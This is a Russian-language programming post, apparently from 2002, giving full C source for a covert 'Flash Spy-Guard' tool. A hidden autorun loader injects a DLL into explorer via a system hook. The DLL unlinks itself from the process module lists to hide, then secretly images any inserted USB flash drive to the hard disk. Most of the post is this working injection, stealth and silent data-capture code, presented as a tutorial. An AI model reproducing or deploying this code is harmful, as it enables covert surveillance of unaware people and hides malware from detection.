Cogitations poenam nemo patitur
(лат.) Никто не несет наказания за мысли
(c)sysenter 2002
JID: sysenter@jabber.no​

Как-то, несколько лет назад (2002 год, за кодес не ругайте), когда я еще только изучал платформу WinNT (переходил с Win98) и, понятное дело, опыта написания софта под эту платформу было ноль, был заказ на приватный «инструмент», блокирующий работу USB флэш-накопителей на ПК секретаря одной фирмы. Видимо было подозрение на то, что кто-то «уносит домой» (а может и не совсем домой) важные (по тем временам м/б криминальные- сведения, касающиеся клиентской базы, базы поставщиков, внутренних прайсов и тому подобное. Так как USB Flash Drive тогда только появились (как и Windows XP), то подобных инструментов просто не существовало. Доступа к интернету на компьютере не было, а CD-RW считались роскошью. Самый большой объем USB Flash Drive, которую я держал в руках был 32 Мб (Были времена еще те).
Пришлось разработать примитивный софт, перехватывающий момент подключения неизвестной флэшки и выключающий при этом монитор и USB. Но заказчики посчитали, что оборона – не для них и добавили требование о полном копировании уже имеющегося содержимого флэш-накопителя на HDD, для «более глубокой контрразведки». Все было реализовано в виде одной DLL, внедряющейся в процесс оболочки explorer при помощи системного хука.
Здесь будет рассмотрен не полный вариант, отлавливающий момент подключения USB флэш накопителя только один раз и создающий на HDD RAW iso образ только корневого раздела флэшки со всеми имеющимися на ней данными. Здесь не будет проверятся по серийному номеру разрешенный накопитель подсоединился или нет.
Алгоритм работы:

1. Внедрение в оболочку explorer при помощи установки хука на события (выполняет отдельная программа, запускающаяся из ветки HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run при загрузке, посредством простой загрузки библиотеки в свое адресное пространство);
2. Перехват функцией обработки хука первого системного события изменения конфигурации оборудования ПК со снятием хука и установки своего субобработчика оконных событий explorer.
3. Перехват субобработчиком оконных событий explorer события изменения аппаратной конфигурации системы, с проверкой этих изменений.
4. Если изменения в конфигурации аппаратуры ПК вызваны съемным носителем (коим является флэш) – снятие обработчика и запуск отдельного потока создания образа флешки.
5. По завершению потока создания образа, DLL автоматически выгружается загрузчиком ядра Windows как более ненужная (хук мы сняли, оконный обработчик тоже, поэтому система считает эту библиотеку более не нужной, правда не всегда).

После всего этого с iso – образом можно работать утилитами типа UltraISO и ей подобных (но не всеми, я предпочитаю WinHEX) и восстанавливать, по-возможности, ранее затертые на флешке файлы.
Итак, поехали. Условимся, что наша dll будет обзываться FSP.dll. Сначала пишем простейший загрузчик, который будет что и делать – это только загружать нашу dll в свое адресное пространство, ждать 10 сек (пока хук не прицепится к оболочке) и выгружаться. Для этого нужно создать проект, не имеющий окна (что бы никто ничего не заподозрил) в любой среде программирования, и
прописать там последовательно в WinMain следующие Win32 API функции (далее будет использован синтаксис Си с упором на начинающих):

Код (Text):

1. LoadLibrary(“FSP.dll”); // Загружаем dll
2. Sleep (10000); //Ждем 10 сек;
3. ExitProcess (0); //Выходим.

Все, загрузчик готов, основная работа будет в dll. После выполнения данного кода наша библиотека будет находиться в адресном пространстве процесса загрузчика, а затем и стандартной оболочки Windows explorer, т.к. в ф-цию DllMain, выполняющуюся при отображении dll в какое – либо адресное пространство мы поместим соответствующий код, реализующий это.
Для дальнейшей работы рекомендую MS Visual Studio с установленным SP и желательно для удобства VisualAssistX, т.к. системное программирование не приемлет всяких там MFC, .NET, BCL, CRT и прочей ООП-муры и базируется только на чистом Win32 и Native API.
Типа кодес

Код (C):

1. header.h
2. #pragma once
3. #define _WIN32_WINNT 0x0501
4. #define WIN32_LEAN_AND_MEAN
5. #define _USER_MODE
6. #pragma comment(linker, "/ENTRY:DllMain")
7. #pragma warning(disable:4078)
8. #pragma warning(disable:4237)
9. #pragma warning(disable:4254)
10. #pragma comment(linker, "/nodefaultlib:msvcrt.lib")
11. #pragma comment(linker, "/MERGE:.rdata=.FGP")
12. #pragma comment(linker, "/MERGE:.text=.FGP")
13. #pragma comment(linker,"/SECTION:.FGP,RW")
14. #include <stdio.h>
15. #include <windows.h>
16. #include <ntundoc.h>
17. #include <winioctl.h>
18. #include <dbt.h>
19. // Shared DATA
20. #pragma data_seg(".FSP")
21. volatile static bool F_STOP=false;
22. volatile static bool flag=false;
23. volatile static bool Gflag=false;
24. volatile static HWND Expl=NULL;
25. static CRITICAL_SECTION CS;
26. #pragma data_seg()
27. #pragma comment(linker, "/SECTION:.FSP,RWS")
28. HMODULE hm=NULL; //Хендл модуля
29. LONG ResultSWL=0; //Новый адрес обработчика окна (SetWindowLong)
30. HHOOK hhook=NULL;
31. //extern "C" PEB* _stdcall RtlGetCurrentPeb(void);
32. HHOOK (WINAPI* LSetWindowsHook)(int,HOOKPROC,HINSTANCE,DWORD);
33. BOOL (WINAPI* LUnhookWindowsHookEx)(HHOOK);
34. LONG (WINAPI* LSetWindowLong)(HWND,int,LONG);
35. //Вывод ошибки
36. void Error(UINT err_code)
37. {
38.   char er[MAX_PATH]={'/0'};
39.   sprintf(er,"Error 0x%lX. Please report error code to autor:\n\tE-mail: sysenter@mail.ru",err_code);
40.   MessageBox(NULL,er,"Flash Spy-Guard Pro v 1.0d (Error)",0);
41. }
42. //Выгрузка, если копирование начато
43. void RemoveFSPH(void)
44. {
45.   if(ResultSWL!=-1)
46.   {
47.   SetLastError(0);
48.     LSetWindowLong=(LONG(WINAPI*)(HWND,int,LONG))GetProcAddress(GetModuleHandle("user32.dll"),"SetWindowLongA");
49.   if(!SetWindowLong(Expl,GWL_WNDPROC,ResultSWL) && !GetLastError())
50.   {
51.   Error(4);
52.   return;
53.   }
54.   ResultSWL=-1;
55.   }
56.   if(hhook!=NULL)
57.   {
58.     LUnhookWindowsHookEx=(BOOL(WINAPI*)(HHOOK))GetProcAddress(GetModuleHandle("user32.dll"),"UnhookWindowsHookEx");
59.   LUnhookWindowsHookEx(hhook);
60.   CloseHandle(hhook);
61.   }
62.   Gflag=false;
63.   hhook=NULL;
64.   //flag=false;
65. }
66. //Копирование посекторно (выполняется в отдельном потоке)
67. inline bool DiskRAWCopy(LPCSTR Sdisk,LPCSTR Dfold)
68. {
69.   char Fdisk[MAX_PATH]="\\\\.\\";
70.   char Serial[MAX_PATH]={'\0'};
71.   DWORD DriveSerial=0;
72.   DWORD dwFileSystemFlags = 0;
73.   strncat(Fdisk,Sdisk,2);
74.   char tmpstr[]="(?)Flash.iso";
75.   tmpstr[1]=*Sdisk;
76.   GetVolumeInformation(Sdisk,NULL,0,&DriveSerial,NULL,&dwFileSystemFlags,NULL,0);
77.   sprintf(Serial,"%d",DriveSerial);
78.   HANDLE hFlash = CreateFile(Fdisk,GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE|FILE_SHARE_DELETE,NULL,OPEN_EXISTING,FILE_FLAG_SEQUENTIAL_SCAN,NULL);
79.   if(INVALID_HANDLE_VALUE == hFlash) goto __err;
80.   DWORD TmpVar=0;
81.   VOLUME_DISK_EXTENTS VDE;
82.   DeviceIoControl(hFlash,IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS,NULL,0,&VDE, sizeof(VDE),&TmpVar,(LPOVERLAPPED) NULL);
83.   CloseHandle(hFlash);
84.   Fdisk[4]='\0';
85.   strncat(Fdisk,"PhysicalDrive",13);
86.   char u[2]={'\0'};
87.   sprintf(u,"%d",VDE.Extents->DiskNumber);
88.   strncat(Fdisk,u,strlen(u));
89.   hFlash=INVALID_HANDLE_VALUE;
90.   hFlash = CreateFile(Fdisk, GENERIC_READ|GENERIC_WRITE,
91.   FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE,
92.   NULL,
93.   OPEN_EXISTING,
94.   FILE_ATTRIBUTE_DEVICE,
95.   NULL );
96.   if(INVALID_HANDLE_VALUE == hFlash) goto __err;
97.   PARTITION_INFORMATION PartInfo;
98.   DWORD Ret;
99.   DeviceIoControl(hFlash, IOCTL_DISK_GET_PARTITION_INFO,
100.   NULL, 0,
101.   &PartInfo, sizeof(PartInfo),
102.   &Ret, NULL );
103.   DISK_GEOMETRY pdg;
104.   DeviceIoControl(hFlash,IOCTL_DISK_GET_DRIVE_GEOMETRY,NULL,0,&pdg, sizeof(pdg),&TmpVar,(LPOVERLAPPED) NULL);
105.   //ULONGLONG DiskSize =PartInfo.PartitionLength.QuadPart; или pdg.Cylinders.QuadPart *pdg.TracksPerCylinder *pdg.SectorsPerTrack *pdg.BytesPerSector;
106.   Fdisk[4]='\0';
107.   strncat(Fdisk,Dfold,strlen(Dfold));
108.   strncat(Fdisk,Serial,strlen(Serial));
109.   strncat(Fdisk,tmpstr,strlen(tmpstr));
110.   HANDLE hVirtual = CreateFile(Fdisk,GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE|FILE_SHARE_DELETE,NULL,CREATE_ALWAYS,FILE_FLAG_SEQUENTIAL_SCAN,NULL);
111.   if(INVALID_HANDLE_VALUE == hVirtual) goto __err;
112.   DWORD BlockSize=pdg.BytesPerSector*pdg.SectorsPerTrack;
113.   DWORD TrackSize=pdg.TracksPerCylinder*BlockSize;
114.   char* buffer=(char*)LocalAlloc(LMEM_ZEROINIT,BlockSize);
115.   DWORD bytes=0;
116.   LONG Poz=0;
117.   for(DWORD Cil=0;pdg.Cylinders.QuadPart>=Cil;Cil++)
118.   {
119.   if(F_STOP)
120.   {
121.   //RemoveFSPH(NULL);
122.   break;
123.   }
124.   else
125.   {
126.   TmpVar=Cil*TrackSize;
127.   for(DWORD Track=0;pdg.TracksPerCylinder>=Track && Poz<=PartInfo.PartitionLength.QuadPart;Track++)
128.   {
129.   if(F_STOP)
130.   {
131.   //RemoveFSPH(NULL);
132.   break;
133.   }
134.   else
135.   {
136.   Poz=TmpVar+Track*BlockSize;
137.   SetFilePointer(hFlash,Poz,NULL,FILE_BEGIN);
138.     if( !ReadFile(hFlash, buffer, BlockSize, &bytes, NULL) ) goto __er;
139.   SetFilePointer(hVirtual,Poz,NULL,FILE_BEGIN);
140.   if( !WriteFile(hVirtual, buffer,BlockSize, &bytes, NULL) ) goto __er;
141.   }
142.   }
143.   }
144.   }
145.   CloseHandle(hFlash);
146.   CloseHandle(hVirtual);
147.   LocalFree(buffer);
148.   return true;
149.   __er:
150.   LocalFree(buffer);
151.   __err:
152.   CloseHandle(hFlash);
153.   CloseHandle(hVirtual);
154. return false;
155. }
156. //Export-команда на выгрузку
157. void FSPH(void)
158. {
159.   F_STOP=true;
160.   PostMessage(Expl,WM_PAINT,0,0);
161.   if(ResultSWL!=-1)
162.   {
163.   SetLastError(0);
164.   if(!SetWindowLong(Expl,GWL_WNDPROC,ResultSWL) && !GetLastError())
165.   {
166.   Error(3);
167.   return;
168.   }
169.   ResultSWL=-1;
170.   }
171. }
172. bool HideDll(HMODULE HDll)
173. {
174.   LIST_ENTRY LIST_ENTRY1;
175.   LDR_MODULE* LDR_MODULE1;
176.   LDR_MODULE* LDR_MODULE2;
177.   PEB* PEB1;
178.   __asm
179.   {
180.    mov  eax, dword ptr fs:[0x00000018]
181.    mov  eax,dword ptr [eax+0x30]
182.    mov PEB1,eax
183.   }
184.   //PEB1=RtlGetCurrentPeb();
185.   while(!PEB1->LdrData->Initialized) Sleep(0);
186.   LIST_ENTRY1=PEB1->LdrData->InLoadOrderModuleList;
187.   LDR_MODULE1=(_LDR_MODULE *)LIST_ENTRY1.Flink;
188.   LIST_ENTRY LIST_ENTRY0;
189.   LIST_ENTRY* LIST_ENTRYA=LIST_ENTRY1.Blink;
190.   //PLDR_DATA_TABLE_ENTRY mod;
191.   do{
192.   Sleep(0);
193.   LIST_ENTRY1=*LIST_ENTRY1.Flink;
194.   LDR_MODULE1=(_LDR_MODULE *)LIST_ENTRY1.Flink;
195.   if(LDR_MODULE1->BaseAddress==HDll)
196.   {
197.     LDR_MODULE2=LDR_MODULE1;
198.   LIST_ENTRY0=*LIST_ENTRY1.Flink;
199.   }
200.   }while(LIST_ENTRYA!=LIST_ENTRY1.Flink);
201.   if(LDR_MODULE2->BaseAddress!=HDll) return false;
202.   DWORD P=0;
203.   if(VirtualProtect((LPVOID)LIST_ENTRYA,4,PAGE_READWRITE, &P))
204.   {
205.   LIST_ENTRY* LIST_ENTRYF;
206.   LIST_ENTRY* LIST_ENTRYB;
207.   LIST_ENTRYF=LIST_ENTRY0.Flink;
208.   LIST_ENTRYB=LIST_ENTRY0.Blink;
209.   LIST_ENTRYB->Flink=LIST_ENTRYF;
210.   LIST_ENTRYF->Blink=LIST_ENTRYB;
211.   //??????
212.   LDR_MODULE2->HashTableEntry.Flink->Blink = LDR_MODULE2->HashTableEntry.Blink;
213.   LDR_MODULE2->HashTableEntry.Blink->Flink = LDR_MODULE2->HashTableEntry.Flink;
214.   RtlZeroMemory(&LDR_MODULE2->BaseAddress,sizeof(DWORD));
215.   RtlZeroMemory(&LDR_MODULE2->FullDllName,sizeof(LDR_MODULE1->FullDllName));
216.   RtlZeroMemory(&LDR_MODULE2->BaseDllName,sizeof(LDR_MODULE1->BaseDllName));
217.   RtlZeroMemory(&LDR_MODULE2->TimeDateStamp,sizeof(DWORD));
218.   RtlZeroMemory(&LDR_MODULE2->SizeOfImage,sizeof(DWORD));
219.   LIST_ENTRY0=LDR_MODULE2->InMemoryOrderModuleList;
220.   LIST_ENTRYF=LIST_ENTRY0.Flink;
221.   LIST_ENTRYB=LIST_ENTRY0.Blink;
222.   LIST_ENTRYB->Flink=LIST_ENTRYF;
223.   LIST_ENTRYF->Blink=LIST_ENTRYB;
224.   LIST_ENTRY0=LDR_MODULE2->InInitializationOrderModuleList;
225.   LIST_ENTRYF=LIST_ENTRY0.Flink;
226.   LIST_ENTRYB=LIST_ENTRY0.Blink;
227.   LIST_ENTRYB->Flink=LIST_ENTRYF;
228.   LIST_ENTRYF->Blink=LIST_ENTRYB;
229.   } else return false;
230.   VirtualProtect((LPVOID)&LIST_ENTRY0,sizeof(LDR_MODULE2),P, &P);
231. return true;
232. }
233. #include "header.h"
234. //Буква диска по битовой маске
235. inline char FirstDriveFromMask (ULONG unitmask)
236. {
237. char i;
238. for (i = 0; i < 26; ++i)
239. {
240.   if (unitmask & 0x1)
241.   break;
242.   unitmask = unitmask >> 1;
243. }
244. return (i + 'A');
245. }
246. //Копируем все файлы с флешки
247. //в заданую директорию в отдельном потоке
248. DWORD __stdcall COPY(LPVOID dn)
249. {
250.   DiskRAWCopy((char*)dn,"I:\\");
251.   return 0;
252. }
253. //APC Оконного обработчика (реакция на новое оборудование)
254. LRESULT CALLBACK WinProc(HWND hwnd,UINT uMsg, WPARAM wParam, LPARAM lParam)
255. {
256.   if(F_STOP)
257.   {
258.   RemoveFSPH();
259.   return 0;
260.   }
261.   else
262.   {
263.   if(uMsg==WM_DEVICECHANGE)
264.   {
265.   if (wParam==DBT_DEVICEARRIVAL)
266.   {
267.   if (((DEV_BROADCAST_HDR*)lParam)->dbch_devicetype==DBT_DEVTYP_VOLUME)
268.   {
269.   if (((DEV_BROADCAST_VOLUME*)lParam)->dbcv_flags!=DBTF_MEDIA && ((DEV_BROADCAST_VOLUME*)lParam)->dbcv_flags!=DBTF_NET)
270.   {
271.   char DriveName[4]={'?',':','\\','\0'};
272.     DriveName[0]=FirstDriveFromMask(((DEV_BROADCAST_VOLUME*)lParam)->dbcv_unitmask);
273.   if (GetDriveType(DriveName)==2)
274.   {
275.   DriveName[2]='\0';
276.     SetThreadPriority(CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)COPY,(LPVOID)DriveName,0,NULL),THREAD_PRIORITY_NORMAL);
277.   }
278.   }
279.   }
280.   }
281.   }
282.   }
283. return CallWindowProcA((WNDPROC)ResultSWL,hwnd, uMsg, wParam, lParam);
284. }
285. //Ставим свой оконный обработчик при первом изменении
286. //в оборудовании ПК, так менее накладно
287. LRESULT CALLBACK HookProc(int nCode, WPARAM wParam, LPARAM lParam)
288. {
289.   if (nCode < 0)  return CallNextHookEx(hhook, nCode,wParam, lParam);
290.   EnterCriticalSection(&CS);
291.   if (((PMSG)lParam)->message==WM_DEVICECHANGE)
292.   {
293.   if (!flag)
294.   {
295.   flag=true;
296.     LSetWindowLong=(LONG(WINAPI*)(HWND,int,LONG))GetProcAddress(GetModuleHandle("user32.dll"),"SetWindowLongA");
297.   SetLastError(0);
298.   ResultSWL=LSetWindowLong(((PMSG)lParam)->hwnd,GWL_WNDPROC,(LONG)WinProc);
299.   if(!ResultSWL && !GetLastError()) {Error(5); LeaveCriticalSection(&CS);return CallNextHookEx(hhook, nCode, wParam, lParam);}
300.   Expl=((PMSG)lParam)->hwnd;
301.   HideDll(hm);
302.   }
303.   }
304.   LeaveCriticalSection(&CS);
305. return CallNextHookEx(hhook, nCode, wParam, lParam);
306. }
307. //Загрузка, выгрузка dll
308. BOOL APIENTRY DllMain( HANDLE hModule,
309.   DWORD  ul_reason_for_call,
310.   LPVOID lpReserved)
311. {
312.   hm=(HMODULE)hModule;
313.   switch (ul_reason_for_call)
314.   {
315.   case DLL_PROCESS_ATTACH:
316.   InitializeCriticalSection(&CS);
317.   break;
318.   case DLL_THREAD_ATTACH:
319.   break;
320.   case DLL_THREAD_DETACH:
321.   break;
322.   case DLL_PROCESS_DETACH:
323.   F_STOP=true;
324.   DeleteCriticalSection(&CS);
325.   break;
326.   }
327.   if(hModule!=0)   return true;
328.   else  return false;
329. }
330. //Export-запуск слежения за изменением оборудования
331. unsigned char FSPH_(void)
332. {
333.   ResultSWL=NULL;
334.   Expl=NULL;
335.   F_STOP=false;
336.   if(!Gflag)
337.   {
338.   HMODULE hu32=GetModuleHandle("user32.dll");
339.   if (hu32==NULL) hu32=LoadLibrary("user32.dll");
340.   LSetWindowsHook=(HHOOK (WINAPI*)(int,HOOKPROC,HINSTANCE,DWORD))GetProcAddress(hu32,"SetWindowsHookExA");
341.   hhook = LSetWindowsHook(WH_GETMESSAGE,HookProc,(HINSTANCE)hm,GetWindowThreadProcessId(GetShellWindow(),NULL));
342.   if(hhook!=NULL){Gflag=true;}else{Error(2);return false;}
343.   }
344.   return true;
345. }

Строго не судите - я тогда только экспериментировал в те годы.